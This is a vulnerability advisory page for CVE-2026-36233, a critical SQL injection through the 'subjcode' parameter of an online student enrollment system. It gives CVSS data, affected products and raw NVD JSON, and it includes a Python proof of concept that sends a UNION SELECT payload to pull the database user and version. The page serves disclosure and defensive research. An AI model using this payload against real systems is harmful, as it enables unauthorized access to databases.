Security Vulnerability Report
CVE-2026-36233 CVSS 9.8 CRITICAL

Published: 2026-04-10 15:16:25
Last Modified: 2026-04-14 17:40:19

Description

A SQL injection vulnerability was found in the assignInstructorSubjects.php file of itsourcecode Online Student Enrollment System v1.0. The issue exists because the value of the "subjcode" parameter is used directly in SQL queries without appropriate sanitization or validation, allowing attackers to inject malicious SQL through that parameter.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:* - VULNERABLE
itsourcecode Online Student Enrollment System v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (Replace with actual target)
target_url = "http://target.com/assignInstructorSubjects.php"

# Payload to test SQL Injection (Extracting database version)
# Assuming the parameter is passed via POST
payload_data = {
    "subjcode": "' UNION SELECT 1, user(), version(), 4-- -"
}

try:
    # Send POST request with malicious payload
    response = requests.post(target_url, data=payload_data)

    # Report the request status and print a snippet of the response for manual analysis
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response snippet:")
        print(response.text[:500])  # Print first 500 chars for analysis
    else:
        print("[-] Target might be down or blocking requests.")
except Exception as e:
    print(f"[!] An error occurred: {e}")

References

https://github.com/Amorsec/CVE-PHP/blob/main/itsourcecode-Online_Student_Enrollment_System_in_assignInstructorSubjects.php_sql_injection.pdf (Exploit, Mitigation, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-36233", "sourceIdentifier": "[email protected]", "published": "2026-04-10T15:16:24.820", "lastModified": "2026-04-14T17:40:18.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL injection vulnerability was found in the assignInstructorSubjects.php file of itsourcecode Online Student Enrollment System v1.0. The reason for this issue is that attackers can inject malicious code via the parameter \"subjcode\" and use it directly in SQL queries without the need for appropriate cleaning or validation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95"}]}]}], "references": [{"url": "https://github.com/Amorsec/CVE-PHP/blob/main/itsourcecode-Online_Student_Enrollment_System_in_assignInstructorSubjects.php_sql_injection.pdf", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}